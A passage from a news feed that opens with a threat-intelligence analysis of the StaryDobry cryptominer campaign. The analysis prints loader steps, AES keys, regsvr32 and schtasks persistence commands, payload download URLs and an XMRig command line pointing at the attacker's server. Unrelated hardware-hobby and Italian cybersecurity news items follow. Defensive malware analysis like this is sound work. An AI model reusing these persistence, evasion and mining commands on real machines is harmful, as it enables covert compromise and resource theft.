If the checks are passed, the malware executes cmd.exe to register unrar.dll as a command handler with regsvr32.exe. The sample attempts to query the following list of sites to determine the user’s IP address.
api.myip [.]com
ip-api [.]com
ipapi [.]co
freeipapi [.]com
ipwho [.]is
api.miip [.]my
This is done to identify the infected user’s location, specifically their country. If the malware fails to detect the IP address, it defaults the country code to
CNOrBY (meaning “China or Belarus”). Next, the sample sends a request to hxxps://pinokino[.]fun/donate_button/game_id=%s&donate_text=%s with the following substitutions:
- game_id = appended with DST_xxxx, where x represents digits. This value is passed as an argument from the installer; in this campaign, we discovered the variant DST_1448;
- donate_text = appended with the country code.
After this generic country check, the sample collects a fingerprint of the infected machine. This fingerprint consists of various parameters, forming a unique identifier as follows:
mac|machineId|username|country|windows|meminGB|numprocessors|video|game_id
This fingerprint is then encoded using URL-safe Base64 to be sent successfully over the network. Next, the malware retrieves MachineGUID from HKLM\Software\Microsoft\Cryptography and calculates its SHA256 checksum. It then collects 10 characters starting from the 20th position (
SHA256(MachineGUID)[20:30]). This hexadecimal sequence is used as the filename for two newly created files: %SystemRoot%\%hash%.dat and %SystemRoot%\%hash%.efi. The first file contains the encoded fingerprint, while the second is an empty decoy. The creation time of the .dat file is spoofed with a random date between 01/01/2015 and 12/25/2021. This file stores the Base64-encoded fingerprint.
After this step, unrar.dll starts preparing to drop the decrypted MTX64.exe to the disk. First, it generates a new filename for the decrypted payload. The malware searches for files in %SystemRoot% or %SystemRoot%\Sysnative. If these directories are empty, the decrypted MTX64.exe is written to the disk as Windows.Graphics.ThumbnailHandler.dll. Otherwise, unrar.dll creates a new file and names it by choosing a random file from the specified directories, taking its name, trimming its extension and appending a random suffix from a predefined list. Besides suffixes, this list contains junk data, most likely added to evade signature-based detection.
Suffix list and junk data
For example, if the malware finds a file named msvc140.dll in %SystemRoot%, it removes the extension and appends the resulting
msvc140 with handler.dll (a random suffix from the list), resulting in msvc140handler.dll. The malware then writes the decrypted payload to the newly generated file in the %SystemRoot% folder.
After that, the sample opens the encrypted MTX64.exe and decrypts it using AES-128 with a hard-coded key,
cls-precompx.dll.
The loader also carries out resource spoofing. First of all, it scans the _res.rc file for DLL property names and values—such as CompanyName, FileVersion and so on—and creates a dictionary of (key, value) pairs. Then it takes a random DLL from the %SystemRoot% folder (exiting if nothing is found), extracts its property values using the VerQueryValueW WinAPI, and replaces the corresponding dictionary values. The resulting resources are embedded into the decrypted MTX64.exe DLL. This file is then saved under the name generated in the previous step. Finally, unrar.dll changes the creation time of the resulting DLL using the same spoofing method as for the fingerprint file.
Spoofed resources
The dropped DLL is installed using the following command:
cmd.exe /C "cd $system32 && regsvr32.exe /s %dropped_name%.dll"
MTX64
This DLL is based on a public project called EpubShellExtThumbnailHandler, a Windows Shell Extension Thumbnail Handler. This stage completely mimics the legitimate behavior up until the actual thumbnail handling. It gets registered as a .lnk (shortcut) file handler, so whenever a .lnk file is opened, the DLL tries to process its thumbnail. However, here the sample implements its own version of the GetThumbnail interface function, and creates a separate thread to perform its malicious activities.
First, this thread writes the current date and month in
dd-mm format to the %TEMP%\time_windows_com.ini file. This stage then retrieves MachineGUID from HKLM\SOFTWARE\Microsoft\Cryptography, calculates SHA256(MachineGUID)[20 : 30], just like unrar.dll did. After that, it checks %SystemRoot% for the .dat file with this name. The presence of this file confirms that the infection is uninterrupted, prompting the DLL to extract the fingerprint and make a query to the hard-coded threat actors’ domain in the following format, where the UID is the fingerprint’s SHA256 hash.hxxps://promouno[.]shop/check/uid=%s
The server sends back a JSON that looks like
{'code':'reg'}. After this, the DLL makes another query to the server with an additional field, data, which is the Base64-encoded fingerprint (uid remains the same):hxxps://promouno[.]shop/check/uid=%s&data=%s
Upon receiving this request, the server also sends a JSON. The malware checks its
code field, which must be equal to either 322 or 200. If it is, the sample proceeds to extract the MD5 checksum from the flmd field in the same JSON and download the next-stage payload from the following link:hxxps://promouno[.]shop/dloadm/uid=%s
Next, the sample calculates the MD5 checksum of the received payload (a kickstarter PE file), and checks this hash against the MD5 checksum from the JSON. If they match, the malware parses the PE structure to locate the Export Address Table, retrieves the
kickstarter function address, and executes it.
Kickstarter running
Kickstarter
The kickstarter PE has an encrypted blob in its resources. This stage reads the blob and stores it in a C++ vector of bytes.
Resource reading
After that, it chooses a random name for the payload using the same method as for MTX64.exe during the execution of unrar.dll. However, there is a difference: if nothing is found in %SystemRoot% or %SystemRoot%\Sysnative, it chooses Unix.Directory.IconHandler.dll as a default file name. The payload is saved to %appdata\Roaming\Microsoft\Credentials\%InstallDate%\. To locate the InstallDate directory, the DLL retrieves the system installation date from the registry subkey HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\InstallDate.
Then the blob is decrypted using the CryptoPP AES-128 implementation. The key consists of the sequence of bytes from
\x00 to \x10. The decrypted contents are written onto the disk. This executable also spoofs its resources using the same method as for MTX64.exe, after which it executes the following command:schtasks /create / tn %s /tr "regsvr32.exe /s %s" / st 00:00 /du 9999:59 / sc once / ri 1 /f
The first argument is the system installation date, while the second one is the path to the dropped DLL. A scheduled task to register a server with regsvr32.exe is created, using the first argument as its name, with a suppressed warning, set to trigger at 00:00. The loader sends a GET request to the hard-coded address
45.200.149[.]58/conf.txt, implicitly setting the request header to User-Agent: StupidSandwichAgent\r\n.
The loader then waits for a response from the server. If the response begins with act, the sample stops execution after creating the scheduled task. If the response is noactive, meaning the targeted device has not been registered previously, the sample tries to delete itself with the following command, which clears everything in the %temp% directory:
Cleanup
Unix.Directory.IconHandler.dll
Subsequently, Unix.Directory.IconHandler.dll creates a mutex named com_curruser_mttx. If this mutex has already been created, execution stops immediately. Then the DLL searches for the %TEMP%\_cache.binary file. If the sample can’t find it, it downloads the binary directly from
45.200.149[.]58 using a GET 44912.f request, with the same StupidSandwichAgent User-Agent header. This file is written to the temporary directory and then decrypted using AES-128 with the same key consisting of the \x00–\x10 byte sequence.
The sample proceeds to open the current process, look for SeDebugPrivilege in the process token, and adjust it if applicable. We believe this is done to inject code into a newly created cmd.exe process. The author chose the easiest way possible, copying the entire open source injector, including its debug strings:
Injector
After injecting the code into the command interpreter, the sample enters an endless loop, continuously checking for taskmgr.exe and procmon.exe in the list of running processes. If either process is detected, the sample is shut down.
Miner implant
This implant is a slightly modified XMRig miner executable. Instead of parsing command-line arguments, it constructs a predefined command line.
xmrig – url =45.200.149[.]58:1448 –algo= rx /0 –user=new-www –donate-level=1 –keepalive – nicehash –background –no-title –pass=x – cpu -max-threads-hint=%d
The last parameter is calculated from the CPU topology: the implant calls the GetSystemInfo API to check the number of processor cores. If there are fewer than 8, the miner does not start. Moreover, the attacker chose to host a mining pool server in their own infrastructure instead of using a public one.
XMRig parses the constructed command line using its built-in functionality. The miner also creates a separate thread to check for process monitors running in the system, using the same method as in the previous stage:
Anti-tracing
Victims
This campaign primarily targets regular users by distributing malicious repacks. Some organizations were also affected, but these seem to be compromised computers inside corporate infrastructures, rather than direct targets.
Most of the infections have been observed in Russia, with additional cases in Belarus, Kazakhstan, Germany, and Brazil.
Attribution
There are no clear links between this campaign and any previously known crimeware actors, making attribution difficult. However, the use of Russian language in the PDB suggests the campaign may have been developed by a Russian-speaking actor.
Conclusions
StaryDobry tends to be a one-shot campaign. To deliver the miner implant, the actors implemented a sophisticated execution chain that exploited users seeking free games. This approach helped the threat actors make the most out of the miner implant by targeting powerful gaming machines capable of sustaining mining activity. Additionally, the attacker’s use of DoH helped conceal communication with their infrastructure, making it harder to detect and trace the campaign.
Indicators of compromise
File hashes
15c0396687d4ff36657e0aa680d8ba42
461a0e74321706f5c99b0e92548a1986
821d29d3140dfd67fc9d1858f685e2ac
3c4d0a4dfd53e278b3683679e0656276
04b881d0a17b3a0b34cbdbf00ac19aa2
5cac1df1b9477e40992f4ee3cc2b06ed
Domains and IPs
45.200.149[.]58
45.200.149[.]146
45.200.149[.]148
hxxps://promouno[.]shop
hxxps://pinokino[.]fun
securelist.com/starydobry-camp…
Space Monitor Points Out Celestial Objects
Logically we understand that the other planets in the solar system, as well as humanity’s contributions to the cosmos such as the Hubble Space Telescope and the International Space Station, are zipping around us somewhere — but it can be difficult to conceptualize. Is Jupiter directly above your desk? Is the ISS currently underneath you?
If you’ve ever found yourself wondering such things, you might want to look into making something like Space Monitor. Designed by [Kevin Assen], this little gadget is able to literally point out the locations of objects in space. Currently it’s limited to the ISS and Mars, but adding new objects to track is just a matter of loading in the appropriate orbital data.
In addition to slewing around its 3D printed indicator, the Space Monitor also features a round LCD that displays the object currently being tracked, as well as the weather. Reading through the list of features and capabilities of the ESP32-powered device, we get the impression that [Kevin] is using it as a sort of development platform for various concepts. Features like remote firmware updates and the ability to point smartphones to the device’s configuration page via on-screen QR aren’t necessarily needed on a personal-use device, but its great practice for when you do eventually send one of your creations out into the scary world beyond your workbench.
If you’re interested in something a bit more elaborate, check out this impressive multi-level satellite tracker we covered back in 2018.
youtube.com/embed/6-wM_a_eX-g?…
Meta rivoluziona il web: Waterworth, il cavo sottomarino da 50.000 km!
Meta ha annunciato il più grande progetto di cavo sottomarino mai realizzato, il Progetto Waterworth , che attraverserà cinque continenti.
Il progetto multimiliardario, che richiederà diversi anni, è stato annunciato sul blog dell’azienda. Meta afferma che rafforzerà la portata e l’affidabilità dell’infrastruttura digitale globale aprendo tre nuovi corridoi oceanici con l’elevata capacità, necessaria per promuovere le tecnologie di intelligenza artificiale.
Secondo l’azienda, l’intelligenza artificiale sta cambiando radicalmente vari ambiti della vita e Meta si impegna a essere all’avanguardia in questo processo tecnologico. Il progetto Waterworth fornirà l’accesso a tecnologie avanzate a milioni di persone in tutto il mondo.
Secondo le dichiarazioni del vicepresidente dell’ingegneria di rete di Meta, Ghai Nagarajan, e il responsabile degli investimenti di rete globali, Alex-Handra Aime, il progetto sarà il più grande progetto di cavo sottomarino nella storia dell’azienda. La sua lunghezza sarà di oltre 50.000 km, ovvero superiore alla circonferenza della Terra.
La rete sottomarina collegherà gli Stati Uniti, l’India, il Brasile, il Sudafrica e altre regioni chiave, promuovendo la cooperazione economica, l’inclusione digitale e lo sviluppo tecnologico. In particolare, il blog sottolinea che il Progetto Waterworth accelererà l’implementazione della strategia digitale dell’India.
Negli ultimi dieci anni Meta ha preso parte allo sviluppo di oltre 20 cavi sottomarini, implementando sistemi con 24 coppie di fibre invece delle standard 8-16. Il nuovo progetto proseguirà questa tendenza, creando la più lunga rete sottomarina ad alta capacità.
L’azienda inoltre prevede di utilizzare Tecniche innovative di posa dei cavi a profondità fino a 7 km e tecniche migliorate di interramento costiero per ridurre al minimo il rischio di danni causati dalle ancore delle navi e da altri pericoli.
Oltre al Progetto Waterworth , Meta sta formando una nuova divisione all’interno di Reality Labs che si concentrerà sullo sviluppo di robot umanoidi alimentati dall’intelligenza artificiale. Andrew Bosworth, CTO di Meta, ha dichiarato in una nota che il nuovo gruppo lavorerà alla creazione di robot per i consumatori utilizzando le capacità del modello Llama.
Inoltre, Meta prevede di espandere la propria presenza al dettaglio aprendo negozi propri, simili al Meta Lab Store , inaugurato a Los Angeles a novembre.
L'articolo Meta rivoluziona il web: Waterworth, il cavo sottomarino da 50.000 km! proviene da il blog della sicurezza informatica.
Apple in Cina Sceglie l’AI Tongyi Qianwen Di Alibaba per Alimentare Siri
GameLook riporta che dopo quasi un anno di attesa, secondo le ultime notizie provenienti dai media stranieri, Apple ha presentato una domanda per collaborare con Alibaba allo sviluppo di un grande modello di intelligenza artificiale e attende l’approvazione del governo nazionale. In altre parole, in futuro Apple Intelligence in Cina fornirà agli utenti servizi di intelligenza artificiale pertinenti basati sul modello Tongyi Qianwen di Alibaba.
Sebbene negli ultimi anni la quota di mercato di Apple in Cina sia stata erosa dai marchi nazionali, secondo gli ultimi dati di IDC la quota di mercato di Apple in Cina sarà del 15,6% nel 2024, in calo di due punti percentuali rispetto al 2023.
Ma essendo una delle aziende con il più grande “spazio fantasy” e il più alto valore per l’utente al mondo, chiunque riesca a collaborare con Apple nell’ambito dell’intelligenza artificiale sarà senza dubbio in grado di cogliere l’iniziativa nell’era dell’intelligenza artificiale nell’ecosistema mobile.
Attualmente nei principali mercati esteri, il partner di Apple per questo servizio è ChatGPT di OpenAI.
Mentre i servizi intelligenti di Apple in Cina cominciano a prendere forma, GameLook, in quanto media, si sta anche chiedendo se il tutto sia utile per i comuni utenti cinesi e cosa significhi. Innanzitutto, per quanto riguarda la notizia della cooperazione di Alibaba con Apple, la prima domanda di molte persone debba essere: perché Alibaba e Tongyi Qianwen?
Dovresti sapere che la presenza di Alibaba non è la più forte nel mercato 2C e nel percorso AI. Dopotutto, c’è Doubao di ByteDance (DAU raggiunge i 17 milioni) davanti, e DeepSeek, che è stato recentemente al centro dell’attenzione e ha superato i 40 milioni di utenti attivi al giorno. Infatti, secondo quanto riportato dai media stranieri, Apple avrebbe scelto Alibaba dopo aver valutato i modelli sviluppati da Tencent, ByteDance, Alibaba e DeepSeek.
Secondo GameLook, Alibaba, in quanto fornitore di servizi cloud e azienda leader nel settore Internet nazionale, può fornire servizi più stabili e completi quando si confronta con clienti di grandissime dimensioni come Apple, in particolare nell’ambito della conformità governativa, ambito in cui Alibaba vanta anch’esso una notevole esperienza.
In questo senso, i nuovi arrivati come DeepSeek sono ovviamente inferiori. È impossibile che quando gli utenti Apple domestici chiamano Siri, la risposta che ottengono sia “Il server è occupato, riprova più tardi”. In secondo luogo, Tongyi Qianwen di Alibaba è sempre stato uno dei modelli di intelligenza artificiale su larga scala più capaci in Cina. Oltre al modello di punta, Tongyi Qianwen di Alibaba, come DeepSeek, è sempre rimasto open source per la comunità e pertanto gode di una forte influenza nella comunità open source globale.
Secondo gli ultimi dati pubblicati ufficialmente da Alibaba, il suo ultimo modello Qwen2.5-Max ha ottenuto risultati paragonabili o addirittura superiori a quelli di DeepSeek, Llama, GPT-4o e altri modelli negli attuali test di benchmark sui modelli di grandi dimensioni più diffusi.
L'articolo Apple in Cina Sceglie l’AI Tongyi Qianwen Di Alibaba per Alimentare Siri proviene da il blog della sicurezza informatica.
Hacker filorussi di DXPLOIT colpiscono il sito Research Italy con un attacco DDoS
Gli hacker filorussi del gruppo DXPLOIT hanno rivendicato un attacco DDoS ai danni del sito Research Italy, portale ufficiale del Ministero dell’Università e della Ricerca italiano (researchitaly.mur.gov.it/). L’azione è stata annunciata tramite il loro canale di comunicazione, dove hanno pubblicato anche prove dell’attacco attraverso un check host, dimostrando che il sito risulta irraggiungibile.
Secondo quanto riportato da DXPLOIT, il sito governativo italiano è stato messo offline tramite un attacco Distributed Denial of Service (DDoS), una tecnica che sovraccarica i server con un’enorme quantità di richieste fino a renderli inutilizzabili. Nel messaggio pubblicato dal gruppo, sono state fornite evidenze con un check-hostche conferma l’indisponibilità del sito. Inoltre, hanno condiviso un IP address (130.186.10.36) legato all’attacco.
Screenshot condivisi dagli hacker mostrano che il sito restituisce un errore 502 Bad Gateway, segnale tipico di un server sovraccarico o di una configurazione errata causata da un’elevata quantità di traffico malevolo.
Questo articolo è stato redatto attraverso l’utilizzo della piattaforma di Recorded Future, partner strategico di Red Hot Cyber e Leader Mondiale nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.
Attacchi DDoS: una minaccia crescente
Gli attacchi DDoS sono uno dei metodi più utilizzati dagli hacktivisti per colpire siti web istituzionali e governativi, soprattutto in periodi di tensione geopolitica. Negli ultimi anni, diversi gruppi filorussi hanno preso di mira paesi europei e NATO con campagne di attacco coordinate.
DXPLOIT non è il primo gruppo a colpire obiettivi italiani. Prima del loro attacco, altri hacker come NoName057(16) hanno ripetutamente preso di mira infrastrutture digitali dell’Italia, tra cui ministeri, aeroporti e aziende critiche.
Questi attacchi rientrano in una più ampia strategia di cyberwarfare, dove gruppi di hacktivisti e cybercriminali cercano di destabilizzare governi, aziende e istituzioni attraverso il sabotaggio digitale.
Italia sempre più bersaglio del cybercrime
Negli ultimi mesi, l’Italia è stata al centro di numerosi attacchi informatici provenienti da gruppi legati alla Russia, con obiettivi che spaziano dalla pubblica amministrazione alle infrastrutture critiche. Le istituzioni stanno lavorando per rafforzare le difese, ma la minaccia resta elevata, con la possibilità di nuovi attacchi in futuro.
L’attacco di DXPLOIT è solo l’ultimo di una lunga serie. Resta da vedere come le autorità italiane risponderanno e se verranno adottate misure di contrasto più efficaci per proteggere i sistemi informatici nazionali.
L'articolo Hacker filorussi di DXPLOIT colpiscono il sito Research Italy con un attacco DDoS proviene da il blog della sicurezza informatica.
Get Ready For KiCAD 9!
Rev up your browsers, package managers, or whatever other tool you use to avail yourself of new software releases, because the KiCAD team have announced that barring any major bugs being found in the next few hours, tomorrow should see the release of version 9 of the open source EDA suite. Who knows, depending on where you are in the world that could have already happened when you read this.
Skimming through the long list of enhancements brought into this version there’s one thing that strikes us; how this is now a list of upgrades and tweaks to a stable piece of software rather than essential features bringing a rough and ready package towards usability. There was a time when using KiCAD was a frustrating experience of many quirks and interface annoyances, but successive versions have improved it beyond measure. We would pass comment that we wished all open source software was as polished, but the fact is that much of the commercial software in this arena is not as good as this.
So head on over and kick the tires on this new KiCAD release, assuming that it passes those final checks. We look forward tot he community’s verdict on it.
Integrated Micro Lab Keeps Track of Ammonia in the Blood
We’ve all got our health-related crosses to bear, and even if you’re currently healthy, it’s only a matter of time before entropy catches up to you. For [Markus Bindhammer], it caught up to him in a big way: liver disease, specifically cirrhosis. The disease has a lot of consequences, none of which are pleasant, like abnormally high ammonia concentration in the blood. So naturally, [Markus] built an ammonia analyzer to monitor his blood.
Measuring the amount of ammonia in blood isn’t as straightforward as you think. Yes, there are a few cheap MEMS-based sensors, but they tend to be good only for qualitative measurements, and other solid-state sensors that are more quantitative tend to be pretty expensive since they’re mostly intended for industrial applications. [Marb]’s approach is based on the so-called Berthelot method, which uses a two-part reagent. In the presence of ammonia (or more precisely, ammonium ions), the reagent generates a dark blue-green species that absorbs light strongly at 660 nm. Measuring the absorbance at that wavelength gives an approximation of the ammonia concentration.
[Marb]’s implementation of this process uses a two-stage reactor. The first stage heats and stirs the sample in a glass tube using a simple cartridge heater from a 3D printer head and a stirrer made from a stepper motor with a magnetic arm. Heating the sample volatilizes any ammonia in it, which mixes with room air pumped into the chamber by a small compressor. The ammonia-laden air moves to the second chamber containing the Berthelot reagent, stirred by another stepper-powered stir plate. A glass frit diffuses the gas into the reagent, and a 660-nm laser and photodiode detect any color change. The video below shows the design and construction of the micro lab along with some test runs.
We wish [Markus] well in his journey, of course, especially since he’s been an active part of our community for years. His chemistry-related projects run the gamut from a homebrew gas chromatograph to chemical flip flops, with a lot more to boot.
youtube.com/embed/AdfZKD2SkI0?…
A Forgotten Consumer PC Becomes a Floating Point Powerhouse
[Michael Wessel] found some of his old DOS 3D graphics software and tried to run it on an 8088 PC. The tale of adding an 8087 co-processor to speed up the rendering was anything but straightforward, resulting in a useful little project.
There was a point around the end of the 1980s when the world of PCs had moved on to the 386, but the humble 8086 and 8088 hung around at the consumer end of the market. For Europeans that meant a variety of non-standard machines with brand names such as Amstrad and Schneider, and even surprisingly, later on Sinclair and Commodore too.
Of these the Schneider Euro PC was an all-in-one design reminiscent of an Amiga or Atari ST, packing a serviceable 8088 PC with a single 3.5″ floppy drive. A cheap machine like this was never thought to need an 8087, and lacked the usual socket on the motherboard, so he made a small PCB daughter board for the 8088 socket with space for both chips.
It’s a surprisingly simple circuit, as obviously the two chips were meant to exist together. It certainly had the desired effect on his frame rate, though we’re not sure how many other Euro PC users will need it. It does make us curious though, as to how quickly a modern microcontroller could emulate an 8087 for an even faster render time. Meanwhile if you’re curious about the 8087, of course [Ken Shirriff] has taken a look at it.
Probably The Most Esoteric Commodore 64 Magazine
The world of computer enthusiasts has over time generated many subcultures and fandoms, each of which has in turn spawned its own media. [Intric8] has shared the tale of his falling down a rabbit hole as he traced one of them, a particularly esoteric disk magazine for the Commodore 64. The disks are bright yellow, and come with intricate home-made jackets and labels. Sticking them into a 1541 drive does nothing, because these aren’t standard fare, instead they require GEOS and a particularly upgraded machine. They appear at times in Commodore swap meets, and since they formed a periodical there are several years’ worth to collect that extend into the 2000s, long after the heyday of the 64.
Picking up nuggets of information over time, he traces them to Oregon, and the Astoria Commodore User Group, and to [Lord Ronin], otherwise known as David Mohr. Sadly the magazine ended with his death in 2009, but until then he produced an esoteric selection of stories, adventure games, and other software for surely one of the most exclusive computer clubs in existence. It’s a fascinating look into computer culture from before the Internet, even though by 2009 the Internet had well and truly eclipsed it, when disks like these were treasured for the information they contained. So if you find any of these yellow Penny Farthing disks, make sure that they or at least their contents are preserved.
Surprisingly, this isn’t the only odd format disk magazine we’ve seen.
Measuring Local Variances in Earth’s Magnetic Field
Although the Earth’s magnetic field is reliable enough for navigation and is also essential for blocking harmful solar emissions and for improving radio communications, it’s not a uniform strength everywhere on the planet. Much like how inconsistencies in the density of the materials of the planet can impact the local gravitational force ever so slightly, so to can slight changes impact the strength of the magnetic field from place to place. And it doesn’t take too much to measure this impact on your own, as [efeyenice983] demonstrates here.
To measure this local field strength, the first item needed is a working compass. With the compass aligned to north, a magnet is placed with its poles aligned at a right angle to the compass. The deflection angle of the needle is noted for varying distances of the magnet, and with some quick math the local field strength of the Earth’s magnetic field can be calculated based on the strength of the magnet and the amount of change of the compass needle when under its influence.
Using this method, [efeyenice983] found that the Earth’s magnetic field strength at their location was about 0.49 Gauss, which is well within 0.25 to 0.65 Gauss that is typically found on the planet’s surface. Not only does the magnetic field strength vary with location, it’s been generally decreasing in strength on average over the past century or so as well, and the poles themselves aren’t stationary either. Check out this article which shows just how much the poles have shifted over the last few decades.
Keebin’ with Kristina: the One with the Cutting Board Keyboard
Doesn’t this look fantastic? Hard to believe it, but the base of this keyboard began life as a cutting board, and there’s a gallery to prove it. This is actually [androidbrick]’s second foray into this type of upcycling.
This time, [androidbrick] used a FiiO KB3 and replaced the bottom half of the plastic shell with a hand-routed kitchen cutting board. The battery has been disabled and it works only in wired mode, which is fine with me, because then you get to use a curly cord if you want.
Those keycaps look even nicer from top-down, which you’ll see in the sound test video linked above. Just search ‘JCM MOA GMK’ on Ali and you’ll find them in a bunch of colorways for around $20. Apparently, [androidbrick] was saving them for months, just waiting for this build.
Via reddit
Why You Should Always Re-flash New Keyboards
About a month ago, [Artistic-Art-3985] bought the cheapest Corne available on Ali and posted a breakdown of the security and electronics.
In a follow-up post, [Artistic] does a great job outlining why you should always re-flash your new keyboards, especially the cheap ones. Although it may seem like a long shot, the threat is real, and he points to a couple examples of shenanigans, like keyloggers.
In a comment to his original post, [Artistic] explains that this particular Ali Corne comes with QMK Vial, which allows you to change the layout on a whim and have it update instantly. This means you don’t have to flash it, but you should, and it’s easy to do and either stick with Vial, or move to straight QMK. He also outlines how it’s done.
The Centerfold: the Hackaday Every Day Carry
So what we’ve got here is a Skeletyl keyboard along with some friends, like a Flipper Zero and a Pwnagotchi. Who knows why the knife, but then again knives are useful I suppose. I really dig the cute little trackball, though it seems like it would be fiddly to actually use. This series of posts by [devpew] kicked off a whole everyday carry thing on reddit, which was enjoyable.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: My Own Personal Holy Grail
Here’s the best part. When I bought Selectric Blue (it was between that and calling her “Bertha the Bluegirl”), she was in a tan case. A grail for sure, but not the holy grail. I was happy enough to get a working II, mind you. But on a whim, I asked the guy if he ever saw any green ones come across his bench. I don’t know why I didn’t ask about blue; it’s my favorite color after all. But then he tells me he has blue and black cases available right then, though they probably wouldn’t fit the machine I bought. But then we figured out that they did, and I met up with him the following day to turn her blue. Now she’s all I ever wanted. I even got the type ball of my dreams — Adjutant.
(Note: I still love my IBM Wheelwriter 5, which is basically the 80s version of the Selectric. I just love them differently, is all, like having a pair of cats. The Wheelwriter is plastic, for one thing, and the Selectric is almost solid steel. But the Wheelwriter is so snappy and types so crisply, so…)
So, you probably want to know things about the Selectric II. It is the sequel to the Selectric I, which was only called the I after the II came out. The original Selectric wowed the world with its spinning golf ball type element, which replaced the swinging type bars of most typewriters and hearkened back to. My machine is in a way the Selectric II.5, as the first IIs introduced in 1971 didn’t have correction built in — that came along in 1973.
So much has been written about Selectrics. But did you know they were part of Cold War-era espionage?
ICYMI: Casio Calculator Gets New Keyboard
[Poking Technology] had one with a broken membrane keyboard and decided to upgrade it to a mechanical keyboard. Of course, it’s no longer pocket-sized, but who’s counting?
If you like build detail, you’re in for a treat, because there are two videos covering the entire process. It was a challenge to disassemble the thing, and soldering wires to the keyboard was no picnic, either — some lines are on the back of PCB and go under the main IC on their way to the top. Excellent work, [Poking]!
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
Decoy Killswitch Triggers Alarm Instead
There are a few vehicles on the road that are targeted often by car thieves, whether that’s because they have valuable parts, the OEM security is easily bypassed, or even because it’s an antique vehicle that needs little more than a screwdriver to get started. For those driving one of these vehicles an additional immobilization feature is often added, like a hidden switch to deactivate the fuel pump. But, in the continual arms race between thieves and car owners, this strategy is easily bypassed. [Drive Science] hopefully took one step ahead though and added a decoy killswitch instead which triggers the alarm.
The decoy switch is placed near the steering column, where it would easily be noticed by a thief. Presumably, they would think that this was the reason the car wouldn’t start and attempt to flip the switch and then start the ignition. But secretly, the switch activates a hidden relay connected to the alarm system, so after a few seconds of the decoy switch activating, the alarm will go off regardless of the position of this switch. This build requires a lot of hiding spots to be effective, so a hidden method to deactivate the alarm is also included which resets the relay, and another killswitch which actually disables the fuel pump is also added to another secret location in the car.
As far as “security through obscurity” goes, a build like this goes a long way to demonstrate how this is an effective method in certain situations. All that’s generally needed for effective car theft prevention is to make your car slightly more annoying to steal than any other car on the road, and we think that [Drive Science] has accomplished that goal quite well. Security through obscurity is generally easily broken on things deployed on a much larger scale. A major European radio system was found to have several vulnerabilities recently thanks in part to the designers hoping no one would look to closely at them.
youtube.com/embed/lA-nVzeukkg?…
OpenAI sblocca ChatGPT: ora può generare contenuti erotici e violenti
OpenAI ha modificato la politica di restrizione dei contenuti per ChatGPT, consentendo la generazione di contenuti erotici e violenti in contesti “appropriati”. Nella nuova versione del documento «Specifiche del modello “, pubblicato mercoledì, si afferma che l’intelligenza artificiale può creare tali materiali senza preavviso se vengono utilizzati in contesti scientifici, storici, giornalistici o altri scenari legittimi.
L’aggiornamento si basa sul lavoro iniziato a maggio 2024, quando OpenAI annunciò per la prima volta la sua intenzione di esplorare la possibilità di fornire agli utenti impostazioni più flessibili per la generazione di contenuti di categoria.
In base alle nuove norme, restano vietate solo alcune forme di contenuto, come le descrizioni di attività illegali e non consensuali. Tuttavia, a determinate condizioni, sono consentiti elementi di erotismo e violenza in formato testo, audio o anche immagine.
Gli utenti di Reddit hanno già notato l’attenuazione dei filtri. Alcuni sono riusciti a creare scenari espliciti o violenti senza alcun preavviso, cosa che prima era impossibile. OpenAI sottolinea che la sua politica di utilizzo rimane in vigore: la creazione di contenuti sessuali destinati ai minori è severamente vietata.
In passato, ChatGPT si rifiutava spesso di generare materiali basati sul principio di “attenzione all’utente”, il che creava difficoltà agli specialisti che lavoravano con referti forensi, documenti legali o testi medici. Ora OpenAI ha riconosciuto la necessità di creare una versione meno censurata di ChatGPT, che consenta agli utenti di ottenere le informazioni di cui hanno bisogno senza restrizioni artificiali.
L’azienda afferma che la decisione è stata presa dopo le numerose risposte della comunità a sostegno dell’idea di una “modalità per adulti”. Sebbene questa modalità non sia un’opzione separata, la politica aggiornata di OpenAI offre agli utenti maggiore flessibilità.
Il CEO di OpenAI, Sam Altman, ha già espresso in passato la necessità di un simile passo. L’azienda ha ora ufficialmente implementato restrizioni più flessibili, sebbene sul mercato esistano da tempo modelli di intelligenza artificiale alternativi che offrono completa libertà, tra cui LLM lanciati localmente.
Le regole aggiornate di OpenAI suddividono i contenuti sensibili in tre categorie. I contenuti proibiti riguardano solo materiale relativo ai minori, sebbene sia consentita la discussione di tali argomenti in contesti educativi e medici. I contenuti riservati includono informazioni pericolose, come istruzioni su come costruire armi, nonché informazioni personali. Ora è possibile generare contenuti sensibili se hanno una giustificazione educativa, storica o artistica.
Nonostante permangano alcune restrizioni, OpenAI sta compiendo un chiaro passo avanti verso una maggiore libertà nell’uso dell’intelligenza artificiale.
L'articolo OpenAI sblocca ChatGPT: ora può generare contenuti erotici e violenti proviene da il blog della sicurezza informatica.
The “Unbreakable” Beer Glasses Of East Germany
We like drinking out of glass. In many ways, it’s an ideal material for the job. It’s hard-wearing, and inert in most respects. It doesn’t interact with the beverages you put in it, and it’s easy to clean. The only problem is that it’s rather easy to break. Despite its major weakness, glass still reigns supreme over plastic and metal alternatives.
But what if you could make glassware that didn’t break? Surely, that would be a supreme product that would quickly take over the entire market. As it turns out, an East German glassworks developed just that. Only, the product didn’t survive, and we lumber on with easily-shattered glasses to this day. This is the story of Superfest.
Harder, Better, Glasser, Stronger
It all started in the German Democratic Republic in the 1970s; you might know it better as East Germany. The government’s Council of Ministers deemed it important to develop higher-strength glass. Techniques for the chemical strengthening of glass were already known by the 1960s, and work on developing the technology further began in earnest.
These efforts came to fruition in the form of a patent filed on the 8th of August, 1977. It was entitled Verfahren und Vorrichtung Zur Verfestigung Von Glaserzeugnissen Durch Ioenenaustausch—or, translated to English—Process and Apparatus for Strengthening Glassware By Ion Exchange. The patent regarded an industry-ready process, which was intended for use in the production of hollow glass vessels—specifically, drinking glassware.
The researchers understood that glasses typically broke in part due to microscopic cracks in the material, which are introduced in the production process. These microcracks could be mitigated by replacing the sodium ions in the surface of the glass with larger potassium ions. The larger ions thus cause a state of compression in the surface layer. Glass is far more capable of resisting compression rather than tension. The high compressive stresses baked into the material help resist tension forces that occur during impact events, thus making the material far more resistant to breakage.
